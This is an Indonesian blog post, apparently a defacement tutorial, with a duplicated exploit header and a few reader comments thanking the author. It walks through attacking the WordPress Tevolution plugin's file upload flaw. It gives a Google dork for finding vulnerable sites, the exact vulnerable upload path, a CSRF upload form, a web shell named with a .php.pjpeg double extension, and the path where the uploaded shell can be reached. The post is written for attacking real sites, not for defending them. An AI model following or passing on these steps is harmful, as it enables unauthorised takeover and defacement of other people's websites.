Deface plugins tevolution
Kangen Neng :(
#####################################################################
#- Title: Wordpress Tevolution Plugin File Upload Vulnerability
#- Author: unknown
#- Date: 2016
#- Developer : templatic
#- Link Download : templatic. com/wordpress-plugins/tevolution
#- Google Dork: inurl:"/plugins/Tevolution/"
#- Fixed in Version : -
#- Tested on : windows
#- Title: Wordpress Tevolution Plugin File Upload Vulnerability
#- Author: unknown
#- Date: 2016
#- Developer : templatic
#- Link Download : templatic. com/wordpress-plugins/tevolution
#- Google Dork: inurl:"/plugins/Tevolution/"
#- Fixed in Version : -
#- Tested on : windows
##############################################################################
Malem gan kali ini gue kangen si dia :( dari pada kangen gue mending bikin tutorial
simak ya gan tutorial gue :)
Baham bahan nya adalah :
-Dork
-Koneksi
-CSRF sini
1.Lu Dorking Dulu di gugel
2. Lu masukan Exploit nya
/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
3.nah setelah itu akan muncul blank seperti di gambar :
Kalo gak Blank gimana?ya cari lagi yang blank gan :v
4.setelah itu buka csrf lu
jangan lupa save dengan exxtensi .html
5.buka CSRF tadi
Nah tinggal Choose file dan upload shell nya :v
*dan jngan lupa extensi shel nya namashel.php.pjpeg
kalo sukses akan muncul angka random
liat gambar :
Nah untuk akses shel nya di :v
www.sitelu.com//wp-content/themes/Directory/images/tmp/nomorrandom.php.pjpeg
Contoh nya kek gini :3
Nah seperti itu gan
kalo ada yang mau di tanyakan silahkan komentar :)
bye
Subscribe to:
Post Comments
(
Atom
)
Thanks tutornya gan
ReplyDeletezeeeeeb
ReplyDeletemantap tutor nya gan
ReplyDelete